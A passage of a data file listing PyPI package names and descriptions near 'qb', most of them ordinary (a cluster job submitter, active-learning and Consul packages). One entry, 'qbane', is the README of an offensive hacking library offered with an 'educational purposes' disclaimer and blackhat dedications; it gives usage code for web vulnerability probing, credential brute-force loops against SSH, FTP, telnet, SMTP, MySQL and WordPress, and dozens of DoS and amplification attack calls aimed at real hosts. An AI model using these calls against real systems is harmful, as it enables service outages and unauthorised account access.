"qbackup", "pacakge-description": "QBackupCross-Platform multi-purpose backup utility"} +{"package": "qball", "pacakge-description": "UNKNOWN"} +{"package": "qball-lang", "pacakge-description": "QBallQBall is a high-level interpreted language written in Python. It is object oriented and has an easy to learn and use syntax. The following is an example of outputting \"Hello, world!\" into the consoleout \"Hello, world!\";It also has any easy function decleration system$ This is a single line comment\n((This is a\nmultiline comment))\n$ This declares a function outarg that takes an argument a\n_outarg a;\n out a;\nend\noutarg \"Hello, world!\";DocsEverything you need to know is in documentation.txtContributeGo here to contribute:https://repl.it/@qballlang/QBallChanges are commited 8:00 PM EST every day I canTrello boardThe official Trello board:https://trello.com/b/cJM6HsR3/qball"} +{"package": "qbandas", "pacakge-description": "qBandasqBandas (QuickBase + Pandas) is a Python package designed to effeciently\ntransfer tabular data between QuickBase applications and the popular Python data\nhandling package Pandas. 
If you are new to Pandas, you can read more about ithere.The advantages of this approach over a QuickBase pipeline are:Access to databases through Python packages.Greater control over features like error logging, data processing,\nautomated reporting, and scheduling.Significantly less performance impact on your QuickBase application.Access tabular data from local sources.Easily pull data from a QuickBase app into Python.The disadvantages of this approach compared to a pipeline are:Requires some knowledge of Python and Pandas.Pleaseread the docsbefore\nusing this package.Installationpython3-mpipinstall-UpipqbandasYou can now use it through import.importqbandas"} +{"package": "qbane", "pacakge-description": "\"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!\" -Bane (Dark Knight).///` `.--::::::---.`` `///. \n h-.-s+++/--
.---/+o++s:.-h \n ++..-. `:../s \n -+ydm-..: :..-dmho:` \n :odmNNNNs..-. `:..+MNNNmmy/. `\n .odmNNNNMMMN`..: -..`mMMMMNNNNmy: \n +mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy. \n .yNNNNMMMMMMMMMd` `-
```````..-` `yMMMMMMMMMMNNNd: \n -dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo \n :mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs` \n /mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy` \n :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy` \n -mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo \n hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm- \n -NNNNNMMMMMMMMMMMMMMMMMM-..: -
NMMMMMMMMMMMMMMMMMMNNNNs \n oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm \n :dNNNNNNMMMMMMMMMMMMMMMMMd
-``````
.hMMMMMMMMMMMMMMMMMMMNNNNNs. \n .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `\n `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `\n +y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N` \n m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `\n /d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m` \n h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/ \n m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so \n d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s \n .h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h \n -y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d \n :s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `\n /o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `\n ++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `\n -h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `\n s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y- \n .h `:`/hNMMMMMMd+: -::
s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y \n o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h. \n `d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s \n o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h. \n `d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s \n o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d. \n `d .:. -sy .. .o--+ -.+-.`.-/
:/
/--`.-+.: +--o- `/d+``--`:s \n s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h. \n .h -:`/.///`/..`:-.:`



.
`: /--../ //:o.:.-y \n s: -o/::/:--.-.-.: : /`:.---/::+. y- \n `h. ``/. `/ ` -.:```

..` ```: / ` :` ./. +o \n .y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s \n .y- -.:```: :/::o+/::/ : ``: : `+o \n `s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/ \n :s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o. \n `/o:+..+`.` -.://+
+--//:-+
////`: `../-.ss- \n /h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y- \n o+``.-+-.::
o//o- /--::--+ .o//s
:/.-//:``:s \n -o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o: \n -o++oy.: .- /`o::oo:-+-/ -- /o++++o: \n `os .. /..//../ ..` `s: \n `o+. `:`:-.-. `.++- \n `/+/.` `. .` `-++:` \n `:+++/:-
-:+++/- \n `.-::--` \n `INTRODUCTION:This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing) and even more ;)SPECIAL SPEECH:this is dedicated to my mentor: Zachary Barker (https://www.facebook.com/zachary.barker.5439), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:-S0u1 (https://www.facebook.com/S0u1.HLoTW) : programmer and blackhat.-Vince (https://www.facebook.com/vincelinux) : Linux and hardware expert, social engeneering and programmer.-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.-Jen Hill.in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)now let's start some tutorials, shall we?TUTORIALS:I-INSTALLING THE LIBRARY AND IMPORTING:you can use pip to do that:pip install baneor you can clone the project's link then run setup.pygit clonehttps://github.com/AlaBouali/banecd banepython setup.py installto import it you just do:import baneNOTES:-you need to install \"expect\" on linux or mac-for windows' users you can't use: bane.ssh1() and bane.telnet1() because they depend on pexpect and it need expect package to work, which can't be installed on windows-termux's users can't use this library cuz some module can't be installed, so it's pointless :(II-USAGE:this module have many incredible, useful and easy use functions that can be implemented in any project that is related to Web Application's Security.Vulnerabilities:default parameters:logs=True (print the test's result on the screen, set to False to not display).returning=False (return a value indicating the success (1/True) or fail (0/False) of the test).timeout: timeout value.proxy: same way as you use \"proxies\" parameters in requests.1-SQL-Injection:(useful link: https://www.acunetix.com/websitesecurity/sql-injection2/ )let's start with a simple SQL Injection testing. 
there are some techniques that can tell us if the web application is vulnerable to SQL-Injection or not, there is:-Error Based.-boolean based.-time based.here we have functions that can determinate whether the web application is vulnerable to SQL-Injection or not using the mentioned techniques.bane.sqlieb('http://example.com/index.php?id=5')#testingfor Error Based SQLIbane.sqlitb('http://example.com/index.php?id=5')#testingfor Time Based SQLIbane.sqlibb('http://example.com/index.php?id=5')#testingfor Boolean Based SQLIt\nhey return only 2 possible results:False: the target is not vulnerable.True: the target is vulnerable.2-XSS:(useful link: https://www.acunetix.com/vulnerabilities/web/cross-site-scripting/ )Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.here we have a function to get all html inputs in any webpage and test each input one by one against this attack with both: GET and POST methods.bane.xss('https://xss-game.appspot.com/level1/frame')output:Getting parametersTest has startedPayload:parameter: query method: GET=> [+]Payload was foundparameter: query method: POST=> [-]Payload was not foundthere is a default payload which is used in case you didn't modify the \"payload\" parameter (set by default to: None) to any XSS payload.you can set differnet xss payloads to test everytime with possibility to use a proxy.there is another functions to test with:bane.xssget('http://example.com/index.php',{parameter: xss-payload-here})bane.xsspost('http://example.com/index.php',{parameter: xss-payload-here})3-FI:(File Inclusion): (useful link:https://www.acunetix.com/vulnerabilities/web/file-inclusion/)we can test a web application if it is vulnerable to FI using this function:bane.fi('http://example.com/index.php?file=page1.php')it returns (in case the parameter \"returning\" set to: True) a dict that contains{ \"Status\" : status # ==>True if success or False is fail\n,\"Nullbyte\" : nullbyte # ==>True if \"nullbyte\" parameter is set to True,\"Link\" : r.url # ==> the result URL}4-PHP code injection:(useful link:https://www.acunetix.com/vulnerabilities/web/php-code-injection/)to test a web application against PHP code injection we can use those functions:bane.injectlink('http://example.com/index.php?id=2')if it returns:False: not vulnerableTrue: vulnerableyou can use another functions to do that as well:bane.getinject('http://example.com/index.php',param=parameter-here)bane.postinject('http://example.com/index.php',param=parameter-here)5-command injection:(useful link:https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013))OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. 
OS command injection is preventable when security is emphasized during the design and development of applications.here we can test the web application against this type of vulnerabilities using those functions:bane.execlink('http://example.com/index.php?doc=1')bane.getexec('http://example.com/index.php',param=your_parameter_here)bane.postexec('http://example.com/index.php',param=your_parameter_here)5-forced browsing:(useful link:https://www.owasp.org/index.php/Forced_browsing)Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible.An attacker can use Brute Force techniques to search for unlinked contents in the domain directory, such as temporary directories and files, and old backup and configuration files. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.This attack is performed manually when the application index directories and pages are based on number generation or predictable values, or using automated tools for common files and directory names.This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.admin panel:we can access and enumerate some or all internal admin panel pages using this method and takeover the panel!!!bane.forcebrowsing('http://example.com/admin/' , ext=\"php\",timeout=10)orbane.forcebrowsing('http://example.com/admin/' , ext=\"asp\")also you can use a function here to find the site's admin login panel:bane.adminpanel('http://example.com/admin/' , ext=\"php\",timeout=7)the default extension is \"php\", you can change it as you like to: asp, aspxusing the parameter \"ext\".filemanager:we can bruteforce the path to a possible filemanager and takeover it using this technique:bane.filemanager('http://example.com')6-Slow DoS vulnerabilities:(useful link:https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/)high timeout value:bane.timeouttest('www.google.com',port=443)slow GET attack test:bane.slowgettest('www.google.com',port=80)slow POST attack test:bane.slowposttest('www.google.com',port=80)slow read attack test:bane.slowreadtest('www.google.com',port=80)connections per IP test:bane.connectionslimit('www.google.com',port=80)7-Bruteforce attacks:(useful link:https://www.acunetix.com/vulnerabilities/web/login-page-password-guessing-attack/)here we are doing a bruteforce attach against a target using a list of usernames and passwords, if the loin function returned True, then logins founds else it failed.FTP:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.ftp(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'SSH:here we have 2 different ways to logins to a ssh server:ssh1:(using pexpect module with \"spawn\" instead of \"pexssh\", which is more cleaver)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.ssh1(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'ssh2:(using paramiko module)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif 
bane.ssh2(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'TELNET:here we have 2 different ways to logins to a telnet server:telnet1:(using pexpect module with \"spawn\" instead of \"pexssh\", which is more cleaver)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.telnet1(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'telnet2:(using telnetlib module)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.telnet2(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'SMTP:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.smtp(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'MYSQL:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.mysql(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'ADMIN LOGIN:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.adminlogin(\"http://example.com/admin/login.php\",{'username':user,'password':pwd)==True:print'[+]Found'breakelse:print'[-]Failed'WORDPRESS ADMIN LOGIN:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.wpadmin(\"http://example.com/\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'HYDRA TOOL:hydra is a famous tool that is widely used for bruteforce attacks. 
here is a python version of it in python based on the above functions.it takes the following parameters:proto:set by default to: \"ssh\", it can be set to: \"ftp\",\"ssh\",\"telnet\",\"smtp\",\"mysql\",\"wp\" (to bruteforce WP sites on HTTP protocol)p: target port, set by default to: 22wl: the list contains usernames and passwords seperated by \":\", ex: [\"admin:admin\",\"admin:12345\",\"root:root\"]wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]bane.hydra(\"127.0.0.1\",proto=\"telnet\",p=23,wl=wordlist)DoS / DDoS:(useful link:https://en.wikipedia.org/wiki/Denial-of-service_attack)bane.hulk('www.google.com',threads=1000) #hulk attackbane.proxhulk('www.google.com',threads=1000) #hulk attack with http proxiesbane.slowloris('www.google.com',p=80,threads=50) #slowloris attackbane.xerxes('www.google.com',p=443,threads=500) #xerxes attackbane.httpflood('www.google.com',p=80,threads=1000) #http floodbane.lulzer('www.google.com',p=80,threads=1000) #http flood with proxiesbane.tcpflood('www.google.com',threads=1000) #tcp floodbane.udp('50.63.33.34',p=80) #udp floodbane.doser('https://www.google.com',threads=500)bane.proxdoser('https://www.google.com',threads=500)bane.torshammer('www.google.com',p=80,threads=1000)bane.slowread('www.google.com',p=80,threads=1000)bane.apachekiller('www.google.com',p=80,threads=500)bane.goldeneye('www.google.com',p=80,threads=1000)bane.medusa('www.google.com',p=80,threads=1000)bane.icmp('50.63.33.34',p=80,threads=100)bane.synflood('50.63.33.34',p=80,threads=100)bane.icmpstorm('50.63.33.34',p=80,threads=100)bane.land('50.63.33.34',p=80,threads=100)bane.udpstorm('50.63.33.34',p=80,threads=100)bane.blacknurse('50.63.33.34',p=80,threads=100)bane.dnsamplif('50.63.33.34',p=80,dnslist=[your_dns_servers_list_here],threads=100)bane.ntpamplif('50.63.33.34',p=80,dnslist=[your_ntp_servers_list_here],threads=100)bane.snmpamplif('50.63.33.34',p=80,dnslist=[your_snmp_servers_list_here],threads=100)"} +{"package": "qbank", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbar", "pacakge-description": "An easily-configurable status bar."} +{"package": "qbase", "pacakge-description": "No description available on PyPI."} +{"package": "qbase_beequants", "pacakge-description": "No description available on PyPI."} +{"package": "qbatch", "pacakge-description": "qbatchExecute shell command lines in parallel on Slurm, S(on) of Grid Engine (SGE),\nPBS/Torque clustersqbatch is a tool for executing commands in parallel across a compute cluster.\nIt takes as input a list ofcommands(shell command lines or executable\nscripts) in a file or piped toqbatch. The list of commands are divided into\narbitrarily sizedchunkswhich are submitted as jobs to the cluster either as\nindividual submissions or an array. Each job runs the commands in its chunk in\nparallel according tocores. Commands can also be run locally on systems\nwith no cluster capability via gnu-paralel.qbatchcan also be used within python using theqbatch.qbatchParserandqbatch.qbatchDriverfunctions.qbatchParserwill accept a list of\ncommand line options identical to the shell interface, parse, and submit jobs.\nTheqbatchDriverinterface will accept key-value pairs\ncorresponding to the outputs of the argument parser, and additionally, thetask_listoption, providing a list of strings of commands to run.Installation$pipinstallqbatchDependenciesqbatchrequires python (>2.7) andGNU Parallel.\nFor Torque/PBS and gridengine clusters,qbatchrequires theqsubandqstatcommands. 
For Slurm workload manager,qbatchrequires thesbatchandsqueuecommands.Environment variable defaultsqbatch supports several environment variables to customize defaults for your\nlocal system.$exportQBATCH_PPJ=12# requested processors per job$exportQBATCH_CHUNKSIZE=$QBATCH_PPJ# commands to run per job$exportQBATCH_CORES=$QBATCH_PPJ# commonds to run in parallel per job$exportQBATCH_NODES=1# number of compute nodes to request for the job, typically for MPI jobs$exportQBATCH_MEM=\"0\"# requested memory per job$exportQBATCH_MEMVARS=\"mem\"# memory request variable to set$exportQBATCH_SYSTEM=\"pbs\"# queuing system to use (\"pbs\", \"sge\",\"slurm\", or \"local\")$exportQBATCH_NODES=1# (PBS-only) nodes to request per job$exportQBATCH_SGE_PE=\"smp\"# (SGE-only) parallel environment name$exportQBATCH_QUEUE=\"1day\"# Name of submission queue$exportQBATCH_OPTIONS=\"\"# Arbitrary cluster options to embed in all jobs$exportQBATCH_SCRIPT_FOLDER=\".qbatch/\"# Location to generate jobfiles for submission$exportQBATCH_SHELL=\"/bin/sh\"# Shell to use to evaluate jobfileCommand line helpusage: qbatch [-h] [-w WALLTIME] [-c CHUNKSIZE] [-j CORES] [--ppj PPJ]\n [-N JOBNAME] [--mem MEM] [-q QUEUE] [-n] [-v] [--version]\n [--depend DEPEND] [-d WORKDIR] [--logdir LOGDIR] [-o OPTIONS]\n [--header HEADER] [--footer FOOTER] [--nodes NODES]\n [--sge-pe SGE_PE] [--memvars MEMVARS]\n [--pbs-nodes-spec PBS_NODES_SPEC] [-i]\n [-b {pbs,sge,slurm,local,container}] [--env {copied,batch,none}]\n [--shell SHELL]\n ...\n\nSubmits a list of commands to a queueing system. The list of commands can be\nbroken up into 'chunks' when submitted, so that the commands in each chunk run\nin parallel (using GNU parallel). The job script(s) generated by qbatch are\nstored in the folder .qbatch/\n\npositional arguments:\n command_file An input file containing a list of shell commands to\n be submitted, - to read the command list from stdin or\n -- followed by a single command\n\noptional arguments:\n -h, --help show this help message and exit\n -w WALLTIME, --walltime WALLTIME\n Maximum walltime for an array job element or\n individual job (default: None)\n -c CHUNKSIZE, --chunksize CHUNKSIZE\n Number of commands from the command list that are\n wrapped into each job (default: 1)\n -j CORES, --cores CORES\n Number of commands each job runs in parallel. If the\n chunk size (-c) is smaller than -j then only chunk\n size commands will run in parallel. This option can\n also be expressed as a percentage (e.g. 100%) of the\n total available cores (default: 1)\n --ppj PPJ Requested number of processors per job (aka ppn on\n PBS, slots on SGE, cpus per task on SLURM). Cores can\n be over subscribed if -j is larger than --ppj (useful\n to make use of hyper-threading on some systems)\n (default: 1)\n -N JOBNAME, --jobname JOBNAME\n Set job name (defaults to name of command file, or\n STDIN) (default: None)\n --mem MEM Memory required for each job (e.g. --mem 1G). This\n value will be set on each variable specified in\n --memvars. 
To not set any memory requirement, set this\n to 0 (default: 0)\n -q QUEUE, --queue QUEUE\n Name of queue to submit jobs to (defaults to no queue)\n (default: None)\n -n, --dryrun Dry run; Create jobfiles but do not submit or run any\n commands (default: False)\n -v, --verbose Verbose output (default: False)\n --version show program's version number and exit\n\nadvanced options:\n --depend DEPEND Wait for successful completion of job(s) with name\n matching given glob pattern or job id matching given\n job id(s) before starting (default: None)\n -d WORKDIR, --workdir WORKDIR\n Job working directory (default:\n current working directory)\n --logdir LOGDIR Directory to save store log files (default:\n {workdir}/logs)\n -o OPTIONS, --options OPTIONS\n Custom options passed directly to the queuing system\n (e.g --options \"-l vf=8G\". This option can be given\n multiple times (default: [])\n --header HEADER A line to insert verbatim at the start of the script,\n and will be run once per job. This option can be given\n multiple times (default: None)\n --footer FOOTER A line to insert verbatim at the end of the script,\n and will be run once per job. This option can be given\n multiple times (default: None)\n --nodes NODES (PBS and SLURM only) Nodes to request per job\n (default: 1)\n --sge-pe SGE_PE (SGE-only) The parallel environment to use if more\n than one processor per job is requested (default: smp)\n --memvars MEMVARS A comma-separated list of variables to set with the\n memory limit given by the --mem option (e.g.\n --memvars=h_vmem,vf) (default: mem)\n --pbs-nodes-spec PBS_NODES_SPEC\n (PBS-only) String to be inserted into nodes= line of\n job (default: None)\n -i, --individual Submit individual jobs instead of an array job\n (default: False)\n -b {pbs,sge,slurm,local,container}, --system {pbs,sge,slurm,local,container}\n The type of queueing system to use. 'pbs' and 'sge'\n both make calls to qsub to submit jobs. 'slurm' calls\n sbatch. 'local' runs the entire command list (without\n chunking) locally. 'container' creates a joblist and\n metadata file, to pass commands out of a container to\n a monitoring process for submission to a batch system.\n (default: local)\n --env {copied,batch,none}\n Determines how your environment is propagated when\n your job runs. \"copied\" records your environment\n settings in the job submission script, \"batch\" uses\n the cluster's mechanism for propagating your\n environment, and \"none\" does not propagate any\n environment variables. 
(default: copied)\n --shell SHELL Shell to use for spawning jobs and launching single\n commands (default: /bin/sh)Some examples:# Submit an array job from a list of commands (one per line)# Generates a job script in ./.qbatch/ and job logs appear in ./logs/\\# All defaults are inherited from QBATCH_* environment variables$qbatchcommands.txt# Submit a single command to the cluster$qbatch--echohello# Set the walltime for each job$qbatch-w3:00:00commands.txt# Run 24 commands per job$qbatch-c24commands.txt# Pack 24 commands per job, run 12 in parallel at a time$qbatch-c24-j12commands.txt# Start jobs after successful completion of existing jobs with names starting with \"stage1_\"$qbatch--afterok'stage1_*'commands.txt# Pipe a list of commands to qbatch$parallelechoprocess.sh{}:::*.dat|qbatch-# Run jobs locally with GNU Parallel, 12 commands in parallel$qbatch-blocal-j12commands.txt# Many options don't make sense locally: chunking, individual vs array, nodes,# ppj, highmem, and afterok are ignoredA python script example:# Submit jobs to a cluster using the QBATCH_* environment defaultsimportqbatchtask_list=['echo hello','echo hello2']qbatch.qbatchDriver(task_list=task_list)"} +{"package": "qbc", "pacakge-description": "qbc: a Python package for Query-by-Committee Active LearningQBC Active Learning is a method used to increase sample efficency in situations where there is a low quantity of data. This implementation provides an automated pipeline to train a model ensemble using QBC active learning with arbitrary base learners.Three methods from the literature (QBag,QBoost,ACTIVE-DECORATE), as well as one original approach (jackAL) based on the jackknife are implemented currently. Modifications and extensions to the articles are proposed and explained in the accompanying paper.Abstract:The field of active learning has many different approaches.\nThis work focuses on the Query-by-Committee (QbC) framework, which uses ensembling methods to find the best sample to query for a label.\nThree methods from the literature are reviewed and implemented: QBag, QBoost, and ACTIVE-DECORATE.\nQBag, which is based on the bagging resampling method, has the advantage of simplicity, but QBoost (based on AdaBoost) often gives a larger performance increase.\nACTIVE-DECORATE uses synthetic data to augment a sample of the training set.\nOnce an ensemble of classifiers is trained on the current corpus, the algorithm then queries for the next labeled sample by finding the maximum \u201cdisagreement\u201d of the models.\nThis is done via a variety of methods, including entropy and absolute divergence from the mean. Overall, the QbC method allows comparable or greater accuracy to a classifier trained on the whole dataset, but with a vastly reduced number of required samples.\nThis work summarizes multiple approaches in the literature to QbC via bagging and boosting, and additionally proposes a new QbC framework called jackAL based on the jackknife; this method offers an advantage over the others because it allows the model to maximize small quantities of data, which is often the case when active learning is required.\nA variation on the jackknife, jackknife-k is explored as well.\nAdditionally, all code is implemented in Python and made available as open-source software on GitHub.AuthorBenjamin PierceSourcesM. H. Quenouille, \u201cProblems in Plane Sampling,\u201d The Annals of Mathematical Statistics, vol. 20, no. 3, pp. 355\u2013375, Sep. 1949, publisher: Institute of Mathematical Statistics. [Online]. 
Available:https://projecteuclid.org/journals/annals-of-mathematical-statistics/volume-20/issue-3/Problems-in-Plane-Sampling/10.1214/aoms/1177729989.fullL. Breiman, \u201cBagging Predictors,\u201d Machine Learning, vol. 24, no. 2, pp. 123\u2013140, Aug. 1996.OnlineR. E. Schapire, \u201cThe strength of weak learnability,\u201d Machine Learning, vol. 5, no. 2, pp. 197\u2013227, Jun. 1990.OnlineS. Argamon-Engelson and I. Dagan, \u201cCommittee-Based Sample Selection for Probabilistic Classifiers,\u201d Journal of Artificial Intelligence Research, vol. 11, pp. 335\u2013360, Nov. 1999, arXiv:1106.0220 [Online(http://arxiv.org/abs/1106.0220)B. Settles, \u201cActive Learning Literature Survey,\u201d University of Wisconsin-Madison Department of Computer Sciences, Technical Report, 2009, accepted: 2012-03-15T17:23:56Z.OnlineN. Abe and H. Mamitsuka, \u201cQuery Learning Strategies Using Boosting and Bagging.\u201d Madison, Wisconsin, USA, Jan. 1998, pp. 1\u20139.R. L. Milidi \u0301u, D. Schwabe, and E. Motta, \u201cActive Learning with Bagging for NLP Tasks,\u201d in Advances in Computer Science, Engineering & Applications. Springer, 2012, pp. 141\u2013147.C. K \u0308orner and S. Wrobel, \u201cMulti-class Ensemble-Based Active Learning,\u201d in Machine Learning: ECML 2006, ser. Lecture Notes in Computer Science. Springer, 2006, pp. 687\u2013694.P. Melville and R. J. Mooney, \u201cCreating diversity in ensembles using artificial data,\u201d Information Fusion, vol. 6, no. 1, pp. 99\u2013111, Mar. 2005.Online\u2014\u2014, \u201cDiverse ensembles for active learning,\u201d in Proceedings of the twenty-first international conference on Machine learning, ser. ICML \u201904, New York, NY, USA, Jul. 2004, p. 74.OnlineC. F. J. Wu, \u201cJackknife, Bootstrap and Other Resampling Methods in Regression Analysis,\u201d The Annals of Statistics, vol. 14, no. 4, pp. 1261\u20131295, Dec. 1986, publisher: Institute of Mathematical Statistics. 
[Online](https://projecteuclid.org/journals/annals-of-statistics/volume-14/issue4/Jackknife-Bootstrap-and-Other-Resampling-Methods-in-Regression-Analysis/10.1214/aos/1176350142.full)LicenseMIT, seeLICENSEfor a copy of the license, oravalible online"} +{"package": "qbc-animal", "pacakge-description": "Recognition Image Animal"} +{"package": "qbc-bot", "pacakge-description": "Smart bot little ape."} +{"package": "qbc-box", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-emoji", "pacakge-description": "Generateing image using emoji."} +{"package": "qbc-face", "pacakge-description": "Face detection and analysis."} +{"package": "qbc-face-ps", "pacakge-description": "Face Control."} +{"package": "qbc-food", "pacakge-description": "To judge a food image or recognize a food image."} +{"package": "qbchemchef", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-idcard-ocr", "pacakge-description": "Recognize ID Card By Ocr."} +{"package": "qb-consul", "pacakge-description": "Introduce to qb-consulversion: 1.0.2how to install:pip install qb-consulIf you want to use it locally:from qb_consul import Consul\n\n\nhost = \"127.0.0.1\" # consul\u670d\u52a1\u5668\u7684ip\nport = 8500 # consul\u670d\u52a1\u5668\u5bf9\u5916\u7684\u7aef\u53e3\nconsul_client = Consul(host, port)\n\n# register service\nname = \"qbzz-server\"\nhost1 = \"127.0.0.1\"\nport1 = 8001\nservice_id = \"qbzz-server-%s\" % port1\nconsul_client.register_service(name, service_id, host1, port1)\n\n# get service\nmessage = consul_client.get_service('qbzz-server')\nhost = message[0]\nport = message[1]"} +{"package": "qb-core-all", "pacakge-description": "This is a core package for qb appqb app is a complete application that implements simple architectural concepts. Its goal to separate business logic from infrastructure.Core modules will contain only logic/code that captures business concepts.Infrastructure modules will implement infrastructure specific code.In this version, all core modules will be in a single package. 
